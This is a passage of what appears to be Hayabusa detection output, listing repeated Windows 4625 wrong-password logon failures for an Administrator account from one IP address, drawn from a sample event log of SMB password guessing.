NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: 